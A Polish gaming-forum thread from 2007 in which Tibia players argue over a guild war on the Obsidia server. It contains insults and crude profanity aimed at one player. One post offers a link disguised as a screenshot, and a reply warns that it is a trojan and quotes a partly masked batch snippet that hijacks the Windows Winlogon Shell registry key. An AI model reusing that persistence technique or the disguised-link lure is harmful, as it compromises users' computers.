Jesteś tu: Tibia.pl / Forum

Wróć   Forum Tibia.pl > Forum ogólne > Wydarzenia ze światów > Obsidia

Notki

Obsidia Wydarzenia ze świata Obsidia

Zamkniety temat.

Opcje tematu
stary 16-02-2007, 08:31   #2861
Paul84
Użytkownik Forum

Paul84's Avatar

Data dołączenia: 03 10 2005
Lokacja: Śląsk

Stan: Aktywny Gracz
Profesja: Elite Knight
Świat: Obsidia
Skille: 19/26
Poziom mag.: 60
Domyślny

Cytuj:
Oryginalnie napisane przez Fin'er Pokaż post
Ekhm.... Nie uważacie, że to czy Suv jest neutralny czy też za lub przeciw jest TYLKO i wyłącznie jego sprawą ? Moim zdaniem on się nawet nie musiał tłumaczyć, że ma lagi. Po prostu nie jest w ET i tyle...
Dokładnie

Cytuj:
Oryginalnie napisane przez hanspel Pokaż post
haha... i dobrze moim zdaniem powinnes go Pephy doje... z resztą ET suv=noob
noob bo co? bo nie chce dojść do et? bo ubił im pare osób z jakiś tam swoich powodów? wiesz wogole kto to jest noob?

Ostatnio edytowany przez Paul84 - 16-02-2007 o 08:35.
Paul84 jest offline  

PAMIĘTAJ! Źródłem utrzymania forum są reklamy. Dziękujemy za uszanowanie ich obecności.
stary 16-02-2007, 08:37   #2862
Kiroy
Użytkownik Forum

Data dołączenia: 25 08 2005

Król

Tibijczyk 1984 : za przeproszeniem ... w dupie byles gowno wiesz .... nie wiesz jakie mamy badz mielismy uklady z Suvem i skad te oczekiwania to nie komentuj tego ... cieszy mnie ze masz kumpli w NG ja tez ich mam i bardzo ich lubie od kilku lat ale wojna jest wojna i nie obowiazuja zadne zasady tym bardziej wojna przeciwko NG ktorzy nie znaja zasad ani spraw honorowych ... a z nimi nie mozna inaczej pieknym za nadiobre odplacac rl za rl i tyle inaczej nie wytlumaczy sie im .. znam ich kolo 3 lat wszystkich tzn stare ng swe wiec naprawde wiele z nimi przezylem i znam ich metody pingi itd .... a ze Hawki se pekuja azared ropaz nie sa lepsi ... a i u nas znajdziesz wiele spoko osob tylko mzoe nie miales okazji ich poznac a moze wcale nie chcesz ... a ze jestes tam kogos kumplem z ng i stoisz za nimi spoko ... ale chyba nie uwazasz zewojna jst z naszej winy i nie mamy o co walczyc i wy*******anie polowy servera za nic od poczatku istnienia Ng to przesada ??
Kiroy jest offline  
stary 16-02-2007, 10:16   #2863
Tibijczyk1984
Użytkownik Forum

Tibijczyk1984's Avatar

Data dołączenia: 26 12 2006
Lokacja: SIED(L)CE

Domyślny

Cytuj:
Oryginalnie napisane przez Kiroy Pokaż post
Tibijczyk 1984 : za przeproszeniem ... w dupie byles gowno wiesz .... nie wiesz jakie mamy badz mielismy uklady z Suvem i skad te oczekiwania to nie komentuj tego ... cieszy mnie ze masz kumpli w NG ja tez ich mam i bardzo ich lubie od kilku lat ale wojna jest wojna i nie obowiazuja zadne zasady tym bardziej wojna przeciwko NG ktorzy nie znaja zasad ani spraw honorowych ... a z nimi nie mozna inaczej pieknym za nadiobre odplacac rl za rl i tyle inaczej nie wytlumaczy sie im .. znam ich kolo 3 lat wszystkich tzn stare ng swe wiec naprawde wiele z nimi przezylem i znam ich metody pingi itd .... a ze Hawki se pekuja azared ropaz nie sa lepsi ... a i u nas znajdziesz wiele spoko osob tylko mzoe nie miales okazji ich poznac a moze wcale nie chcesz ... a ze jestes tam kogos kumplem z ng i stoisz za nimi spoko ... ale chyba nie uwazasz zewojna jst z naszej winy i nie mamy o co walczyc i wy*******anie polowy servera za nic od poczatku istnienia Ng to przesada ??
Niestoje za nikim tylko mówie ze niejest tak jak niektórzy pisza ze 1 strona jest cacy a 2 jest beee poprostu obie strony przeginaja i niema co sie oszukiwac a co do hawków to no qoment

wiem ze masz racje napeno są u Was tez ludzie wpozo bo sa wszedzie ale te czarne owce wasze jebią wam opinie strasznie i niedziw sie ze ludzie sie wqrwiają bo kazdy jak pada to sie wqrwi to naturalna kolej rzeczy a ze strony pephy and rl jego kilku kumpli z naszego kraju padlo bo czuja sie bezkarni a pephy im jeszcze utwierdza w bani ze są ch.j wie kim i mogą robic co chca bo są rl jego mnie to smieszy

A to czy bylem w dupie czy nie to juz nie powinno cie interesowac chyba
Tibijczyk1984 jest offline  
stary 16-02-2007, 10:21   #2864
Ghost111
Zbanowany

Data dołączenia: 25 02 2006
Lokacja: Jelenia Góra

Stan: Usunięty
Domyślny

Cytuj:

No Kiroy ma racje, Pephy tez ma troche racji i Suv tak samo..
Nie wiem jaki byl uklad miedzy wami, czy Suv mial dojsc czy nie.
Mysle ze teraz to juz raczej nie dojdzie do was a zabijac Suv spowodujecie ze pojdzie do Ng co nie zmienia faktu ze i tak osiagnawszy tam powiedzmy maxymalnie 140 level( choc chyba troche przesadzilem nie? ) zostanie zajebany w demoni jak Pephy..
Tylko ze potem znajac zycie nie bedzie miejsca dla niego ani w Ng ani w Et.. Wiec mysle ze dla dobra sprawy, Pephy powinnien przeprosic Suv powinniscie sobie wyjasnic to i owo... Suv bez lagow to szybko expiacy Suv wiec jego wolnosc nie potrwa dlugo (niestety) i wyladuje w Et predzej czy pozniej.

Dziekuje za uwage.
Ghost111 jest offline  
stary 16-02-2007, 10:49   #2865
Kiroy
Użytkownik Forum

Król

taa jest pare rozwiazan sytuacji wtedy :

Suv neutral bo ma lagi i poklocony z Et
zabijamy suva i dochodzi do Ng ale przeciez nie bedzie gral bo ma starszne lagi ... chyba ze nie ma lagow i nas w chuja robil ale w to watpie i mu ufam
suv nic nie robi expi wbija 130 lvl i pada i chce do et ale czy nie bedzie za pozno ?? w sumie w dupie juz to mam ...

zreszta jak przegramy wojne to bedzie dopiero sieka

tibijczyk masz racje nie interesuje mnie czy zbierasz znaczki czy nie ... ale zauwaz ze nasze PA do PA ng to kropla w morzu ...

Wujo Kiroy
Kiroy jest offline  
stary 16-02-2007, 11:18   #2866
Qxwaaatz
Użytkownik Forum

Data dołączenia: 28 01 2007

Domyślny

Nie mowcie ze jestem asslicker bo nie jestem ale Kiroy ma racje, nie raz widzialem jak typki z koncowka "Tejparn" pekowali pod depo bez powodu i nikt im nic niezrobil bo sie poprostu bal, ostatnio mialem przygode z Alithem , pk team mnie strapowal na guardach zabilem jednego z nich noi oczywiscie alith sie wpierdolil i mialem hunta praktycznie za nic.. Mowiac szczerze wole jush tych pekujacych rli pephego czy hawkow niz jebane ng...
Qxwaaatz jest offline  
stary 16-02-2007, 12:05   #2867
Ptak~
Użytkownik Forum

Ptak~'s Avatar

Data dołączenia: 30 04 2006
Lokacja: Bydgoszcz

Stan: Na Emeryturze
Domyślny

@ pephy

i vice versa
groziles, ze ubijesz donasa.

@ kiroy

lagi mam teraz duzo mniejsze, ostatnio troche expilem, ale jak lagi mniejsze to i problemy z kilkoma osobami wyszly. chociaz lagi i tak dalej sa, 24/h w demonii siedziec nie moge.

I wipe it off on tile, the light is brighter this time
Everything is 3D blasphemy
My eyes are red and gold, the hair is standing straight up
This is not the way I pictured me
I can't control my shakes
How the hell did I get here?
Something about this, so very wrong
I have to laugh out loud, I wish I didn't like this
Is it a dream or a memory?
Ptak~ jest offline  
stary 16-02-2007, 12:56   #2868
don~
Użytkownik Forum

don~'s Avatar

Data dołączenia: 24 03 2006
Lokacja: Bydgoszcz

don~ ma numer GG 6472095
Domyślny

@edit

nvm

Ostatnio edytowany przez don~ - 16-02-2007 o 13:34.
don~ jest offline  
stary 16-02-2007, 13:49   #2869
Tibijczyk1984
Użytkownik Forum

Tibijczyk1984's Avatar

Data dołączenia: 26 12 2006
Lokacja: SIED(L)CE

Evul

Cytuj:
Oryginalnie napisane przez Qxwaaatz Pokaż post
Nie mowcie ze jestem asslicker bo nie jestem ale Kiroy ma racje, nie raz widzialem jak typki z koncowka "Tejparn" pekowali pod depo bez powodu i nikt im nic niezrobil bo sie poprostu bal, ostatnio mialem przygode z Alithem , pk team mnie strapowal na guardach zabilem jednego z nich noi oczywiscie alith sie wpierdolil i mialem hunta praktycznie za nic.. Mowiac szczerze wole jush tych pekujacych rli pephego czy hawkow niz jebane ng...

Z ALITHEM TEZ MIALEM PODOBNĄ PRZYGODE BO QMPEL MIAL HUNTA I NIECHCIALEM GO Z DOMQ WYWALIC ALE JUZ JEST OK HEHE

POZDRAWIAM
Tibijczyk1984 jest offline  
stary 16-02-2007, 16:42   #2870
Turbo-master
Użytkownik forum

Data dołączenia: 16 02 2007

Imię: retired
Świat: obsidia
Domyślny

Cytuj:
Oryginalnie napisane przez Luppy Pokaż post
@Pephy
Narszcie zauważyłeś że Suv~ to Naab , pkey ,cwaniak,maniak itp. wieć powiedzmy to szczeże

Suv~ hu* ci w dup*

zgadzam sie w stu procentach w koncu wszyscy wiemy ze suv to czternastoletni dzieciak pelen kompleksow a tibii nie traktuje jako gry tylko jako swoje drugie zycie (w sylwestra wbil 2lvle ) i tu chce sie mscic bo ma duzy lvl za to ze w szkole go gnebia normalne chlopaki

a odnosnie wojny to podejrzewam ze wygra lepszy
co prawda ng juz pare razy pokazalo co potrafi ale mysle ze to nie koniec mozliwosci et

a i jeszcze jedno co do suvva i wyszstkich co go znaja:
uwazajcie na niego bo bedzie waszym kolega tylko wtedy gdy bedzie mial w tym interes

Ostatnio edytowany przez Turbo-master - 16-02-2007 o 17:19.
Turbo-master jest offline  
stary 16-02-2007, 18:38   #2871
zielaq
Użytkownik Forum

zielaq's Avatar

Data dołączenia: 26 07 2004

Imię: Pephy
Profesja: Master Sorcerer
Poziom: 222
Poziom mag.: 81
Domyślny

wiek tu nie gra zadnej roli , znam osoby pelnoletnie ktore nie mialy by nawet szans nawiazac konwersacji ze mna badz z Suvem
zielaq jest offline  
stary 16-02-2007, 19:53   #2872
Illu'Hawk
Guest

Żarówka

Nareszcie LEGENDARNE ue Fozivo mozna zobaczyc na wlasne oczy:

ss by Yasnor (deep red )

http://fozivobanmasspkscreenfromwww.tibia.com.patrz.pl

Sorry ale mojego ftp na interii automatycznie blokuje forum ( )
i dalem przekierowanie przez patrz.pl

stary 16-02-2007, 22:05   #2873
milosz15
Użytkownik Forum

Data dołączenia: 24 05 2006

Stan: Na Emeryturze
milosz15 ma numer GG 5181387
Domyślny

Cytuj:
Oryginalnie napisane przez Illu'Hawk Pokaż post

ss by Yasnor (deep red )

a potem obudziles sie z mokra posciela ?
milosz15 jest offline  
stary 16-02-2007, 23:06   #2874
Kiroy
Użytkownik Forum

Król

poprostu czasami brakuje kamieni na to wszystko ...
Kiroy jest offline  
stary 17-02-2007, 00:11   #2875
^LoLiK^
Użytkownik Forum

^LoLiK^'s Avatar

Data dołączenia: 22 09 2005
Lokacja: Głogów PL / Tilburg NL

Imię: Yotox
Profesja: Royal Paladin
Gildia: Saints
Świat: Nerana
Poziom: 217
Skille: ??/??
Poziom mag.: ??
Problem

Cytuj:
Oryginalnie napisane przez Illu'Hawk Pokaż post

ss by Yasnor (deep red )

Nie zsac tego aplikacja typu MS-DOS : OOOOOOOOO PPPPPPP

Dr.Web
Found Trojan.Folsnif

VBA32
Found Trojan.Folsnif

I wsio jasne

Jeszcze tu maly wycinek z pliku

> temp.reg ECHO REGEDIT4
>> temp.reg ECHO.
>> temp.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
>> temp.reg ECHO "Shell"="explorer***** ˙˙˙˙ /windows/services*****" ˙˙˙˙
˙˙˙˙ >> temp.reg ECHO. ˙˙˙˙ START /WAIT REGEDIT /S temp.reg ˙˙˙˙ DEL temp.reg ˙˙˙˙ windows\xxxx.bat open c:\x***** ˙˙˙˙ c:\x***** ˙˙˙˙
aeghthrthcvbh ˙˙˙˙ windows\services*****

Evul hackier ?? !!
stary 17-02-2007, 00:21   #2876
Fin'er
Użytkownik Forum

Fin'er's Avatar

Data dołączenia: 24 06 2006
Lokacja: ok. Rybnika

Imię: Fingregher
Domyślny

Cytuj:
Kiroyku ok, Ty masz prawo mieć tam jakieś zarzuty do Suv'a bo wiesz jak się rzeczy miały. Ale denerwują mnie tu osoby typu Hanspel i inne które najeżdżają na Suv'a dla pro formy a na 99% nie są w ET bo pewnie pochwaliliby się tym w podpisie. Więc de facto Suv im nic nie zrobił... .

Cytuj:
Oryginalnie napisane przez Ghost111 Pokaż post
No Kiroy ma racje, Pephy tez ma troche racji i Suv tak samo..
Nie wiem jaki byl uklad miedzy wami, czy Suv mial dojsc czy nie.
Mysle ze teraz to juz raczej nie dojdzie do was a zabijac Suv spowodujecie ze pojdzie do Ng co nie zmienia faktu ze i tak osiagnawszy tam powiedzmy maxymalnie 140 level( choc chyba troche przesadzilem nie? ) zostanie zajebany w demoni jak Pephy..
Tylko ze potem znajac zycie nie bedzie miejsca dla niego ani w Ng ani w Et.. Wiec mysle ze dla dobra sprawy, Pephy powinnien przeprosic Suv powinniscie sobie wyjasnic to i owo... Suv bez lagow to szybko expiacy Suv wiec jego wolnosc nie potrwa dlugo (niestety) i wyladuje w Et predzej czy pozniej.

Dziekuje za uwage.
I tak źle i tak niedobrze ?

Cytuj:

tibijczyk masz racje nie interesuje mnie czy zbierasz znaczki czy nie ... ale zauwaz ze nasze PA do PA ng to kropla w morzu ...

Wujo Kiroy
No powiedzmy idziecie łep w łep...

Cytuj:
Oryginalnie napisane przez Turbo-master Pokaż post
zgadzam sie w stu procentach w koncu wszyscy wiemy ze suv to czternastoletni dzieciak pelen kompleksow a tibii nie traktuje jako gry tylko jako swoje drugie zycie (w sylwestra wbil 2lvle ) i tu chce sie mscic bo ma duzy lvl za to ze w szkole go gnebia normalne chlopaki

a i jeszcze jedno co do suvva i wyszstkich co go znaja:
uwazajcie na niego bo bedzie waszym kolega tylko wtedy gdy bedzie mial w tym interes
1) Co Cię obchodzi co On robił w sylwestra ? A jakby grał na trąbce i dmuchał w balony też by Cię to interesowało ? Taaa Ty pewnie obaliłeś 2 x 0,7 l Bolsa sam i się jeszcze trzymałeś na nogach etc...

2)Ja mam 40 lvl, facc, i naprawdę nie umiem się doszukać jaki to duuuży interes ma Suv w byciu moim kumplem . A jednak jest...

Cytuj:
Oryginalnie napisane przez zielaq Pokaż post
wiek tu nie gra zadnej roli , znam osoby pelnoletnie ktore nie mialy by nawet szans nawiazac konwersacji ze mna badz z Suvem
Zgadzam się z tym bo ktoś może być stary a gupi.
stary 17-02-2007, 02:57   #2877
Ghost111
Zbanowany

Data dołączenia: 25 02 2006
Lokacja: Jelenia Góra

Stan: Usunięty
Domyślny

Wiecie dlaczego sie przegrywa wojny? Miedzyinnymi dlatego ze ludzie bioracy w niej udzial nie potrafia sie dogadac, wiec odluzcie na bok wszelkie wasze spory i wezcie sie od roboty, bo wy tu jak zwykle uzeracie sie na forum zamiast cos zorganizowac konkretna akcje. Jak juz napisalem Suv predzej czy pozniej stanie sie ofiara explocka wiec te wasze pogrozki sa nie na miejscu.
Tak wiec trzymajcie sie chlopaki mam nadzieje ze jeszcze zaskoczycie nas jakas wygrana bitwa...

Moze juz niedlugo bedziemy wspolnie zwalczac ngersow...
Ghost111 jest offline  
stary 17-02-2007, 10:44   #2878
.:Boixos:.
Użytkownik Forum

.:Boixos:.'s Avatar

Data dołączenia: 18 01 2005
Lokacja: Gdańsk

Domyślny

@suv
po tym co uslyszalem od pepka i sziki dzisiaj, wiesz ze nawet w to wierze ?
jakbys narobil z pieciu boixosow i wpuscil na Tibie ó.ó

tyle osob,wiedzacych o co chodzi ,mowi tak samo,wiec cos w tym jest olus.
Wiele osob z et pokladalo w to tobie nadzieje,ci ktorzy maja wiedziec,wiedza jak mialo byc.straciles szacunek w oczach wielu ludzi ;STo ze michal ci ufa-juz naprawde nie wiem jak to wytlumaczyc.A juz kozaczenie do pephyego :S

Name: Lady Szikaka
Guild membership: Eternic of the Eternal Team
Feb 10 2007, 23:19:34 CET Killed at Level 75 by Suv the Dark Magican
and by Gearspark

reason?ten o ktorym slyszalem jest ze tak powiem-lekko dziecinny.

24/h - a co to ?:S 24/7 ? o to ci chodzilo?

tak to czasem wyglada xD no ale to co robil w sylvka to chyba jego spraw.to wolales isc sie najebac a on wolal posiedziec i poexpic,chociaz z tego co wiem nie expil o 00;00 ,skonczyl wczesniej i swietowal nowy rok.Ale szczerze mowiac huj mnie obchodzi to,jak spedzil sylvka i czy jest gnebiony w rl.
Na tym forum rozmawiamy o tibi a nie o rl life
Trójmiasto do Lechii należy!!
.:Boixos:. jest offline  
stary 17-02-2007, 10:58   #2879
Pawlos II
Użytkownik Forum

Pawlos II's Avatar

Data dołączenia: 14 07 2005
Lokacja: Gdańsk/Jasień

Profesja: Master Sorcerer
Świat: Kyra
Pawlos II ma numer GG 6793058
Domyślny

@Suv
Jestes kompletnym gownem...
Przetsales kiedys myslec o tibia chociaz na 20 min nie mwoiac o snie???
Powinienes sie leczyc...
Zal jak patrze na takie $%#@! dziecko, które od kompa nie odchodzi...

"Zobaczymy"
Pawlos II jest offline  
stary 17-02-2007, 11:03   #2880
Kiroy
Użytkownik Forum

Król

tA boixos dokladnie o to chodiz zostanmy przy nickach z forum mialo yc inaczej a nie jest ... jak juz powiedzialem mam takie podejscie ... mozemy przegarc wojne ok no trudno nie pierwsza i nie ostatniawojna w moim zyciu ... ale niech za miesiac czy dwa zacznie mi ktos plakacz wojne robimy bo ng ich hunci za nic .... pierdole nie rusze palcem i nikogo nie zalatwie .... ci ludzie co nas zostawili to ma mich w powazaniu niech ich kickna jak nas za nic i bedzie sprawiedliwie ale potem juz nie bedzie bo sie balem o chara itd .... ja moge nie grac ale nie tylko ja nie bede gral na obsidii wtedy zreszta ludzie ktorzy np z Et gadaja jacy nie sa swietni itd a potem na battle panika tez mam ich w powazaniu ogolem o mam normalnie wszystko w dupie a mowie po wojnie jak przegramy troche se pekniemy ludzi napewno ale co mi tam zwala bedzie

Wuja Kiroy
Kiroy jest offline  
Zamkniety temat.

Użytkowników czytających ten temat: 3 (zarejestrowanych: 0, gości: 3)

Zasady postowania